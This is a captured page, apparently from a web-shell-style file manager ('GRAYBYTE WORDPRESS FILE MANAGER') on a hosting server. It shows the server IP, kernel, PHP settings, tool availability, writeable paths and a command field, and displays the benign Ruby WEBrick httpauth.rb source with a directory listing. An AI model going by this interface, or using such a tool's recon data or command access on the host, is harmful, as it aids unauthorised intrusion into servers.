GRAYBYTE WORDPRESS FILE MANAGER3890

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/alt/ruby20/lib64/ruby/2.0.0/webrick/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/alt/ruby20/lib64/ruby/2.0.0/webrick//httpauth.rb
#
# httpauth.rb -- HTTP access authentication
#
# Author: IPR -- Internet Programming with Ruby -- writers
# Copyright (c) 2000, 2001 TAKAHASHI Masayoshi, GOTOU Yuuzou
# Copyright (c) 2002 Internet Programming with Ruby writers. All rights
# reserved.
#
# $IPR: httpauth.rb,v 1.14 2003/07/22 19:20:42 gotoyuzo Exp $

require 'webrick/httpauth/basicauth'
require 'webrick/httpauth/digestauth'
require 'webrick/httpauth/htpasswd'
require 'webrick/httpauth/htdigest'
require 'webrick/httpauth/htgroup'

module WEBrick

  ##
  # HTTPAuth provides both basic and digest authentication.
  #
  # To enable authentication for requests in WEBrick you will need a user
  # database and an authenticator.  To start, here's an Htpasswd database for
  # use with a DigestAuth authenticator:
  #
  #   config = { :Realm => 'DigestAuth example realm' }
  #
  #   htpasswd = WEBrick::HTTPAuth::Htpasswd.new 'my_password_file'
  #   htpasswd.auth_type = WEBrick::HTTPAuth::DigestAuth
  #   htpasswd.set_passwd config[:Realm], 'username', 'password'
  #   htpasswd.flush
  #
  # The +:Realm+ is used to provide different access to different groups
  # across several resources on a server.  Typically you'll need only one
  # realm for a server.
  #
  # This database can be used to create an authenticator:
  #
  #   config[:UserDB] = htpasswd
  #
  #   digest_auth = WEBrick::HTTPAuth::DigestAuth.new config
  #
  # To authenticate a request call #authenticate with a request and response
  # object in a servlet:
  #
  #   def do_GET req, res
  #     @authenticator.authenticate req, res
  #   end
  #
  # For digest authentication the authenticator must not be created every
  # request, it must be passed in as an option via WEBrick::HTTPServer#mount.

  module HTTPAuth
    module_function

    def _basic_auth(req, res, realm, req_field, res_field, err_type,
                    block) # :nodoc:
      user = pass = nil
      if /^Basic\s+(.*)/o =~ req[req_field]
        userpass = $1
        user, pass = userpass.unpack("m*")[0].split(":", 2)
      end
      if block.call(user, pass)
        req.user = user
        return
      end
      res[res_field] = "Basic realm=\"#{realm}\""
      raise err_type
    end

    ##
    # Simple wrapper for providing basic authentication for a request.  When
    # called with a request +req+, response +res+, authentication +realm+ and
    # +block+ the block will be called with a +username+ and +password+.  If
    # the block returns true the request is allowed to continue, otherwise an
    # HTTPStatus::Unauthorized error is raised.

    def basic_auth(req, res, realm, &block) # :yield: username, password
      _basic_auth(req, res, realm, "Authorization", "WWW-Authenticate",
                  HTTPStatus::Unauthorized, block)
    end

    ##
    # Simple wrapper for providing basic authentication for a proxied request.
    # When called with a request +req+, response +res+, authentication +realm+
    # and +block+ the block will be called with a +username+ and +password+.
    # If the block returns true the request is allowed to continue, otherwise
    # an HTTPStatus::ProxyAuthenticationRequired error is raised.

    def proxy_basic_auth(req, res, realm, &block) # :yield: username, password
      _basic_auth(req, res, realm, "Proxy-Authorization", "Proxy-Authenticate",
                  HTTPStatus::ProxyAuthenticationRequired, block)
    end
  end
end

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
March 03 2024 22:53:08
root / root
0755
httpauth
--
March 03 2024 22:43:33
root / linksafe
0755
httpservlet
--
March 03 2024 22:43:33
root / linksafe
0755
accesslog.rb
4.308 KB
January 26 2013 01:12:54
root / linksafe
0644
cgi.rb
7.97 KB
January 26 2013 01:12:54
root / linksafe
0644
compat.rb
0.891 KB
May 17 2011 20:29:58
root / linksafe
0644
config.rb
5.564 KB
January 26 2013 01:12:54
root / linksafe
0644
cookie.rb
3.884 KB
January 26 2013 02:31:43
root / linksafe
0644
htmlutils.rb
0.664 KB
February 16 2014 16:56:01
root / linksafe
0644
httpauth.rb
3.327 KB
May 10 2011 23:37:43
root / linksafe
0644
httpproxy.rb
9.646 KB
March 24 2013 16:27:10
root / linksafe
0644
httprequest.rb
14.326 KB
December 24 2013 15:46:01
root / linksafe
0644
httpresponse.rb
10.563 KB
January 26 2013 01:12:54
root / linksafe
0644
https.rb
1.865 KB
January 26 2013 01:12:54
root / linksafe
0644
httpserver.rb
7.688 KB
January 26 2013 01:12:54
root / linksafe
0644
httpservlet.rb
0.653 KB
October 02 2009 10:45:39
root / linksafe
0644
httpstatus.rb
5.263 KB
August 21 2012 04:50:18
root / linksafe
0644
httputils.rb
12.706 KB
February 16 2014 16:56:01
root / linksafe
0644
httpversion.rb
1.573 KB
January 26 2013 01:12:54
root / linksafe
0644
log.rb
3.922 KB
January 26 2013 01:12:54
root / linksafe
0644
server.rb
8.415 KB
January 26 2013 01:12:54
root / linksafe
0644
ssl.rb
6.668 KB
January 26 2013 01:12:54
root / linksafe
0644
utils.rb
6.444 KB
January 26 2013 01:12:54
root / linksafe
0644
version.rb
0.375 KB
January 26 2013 01:12:54
root / linksafe
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF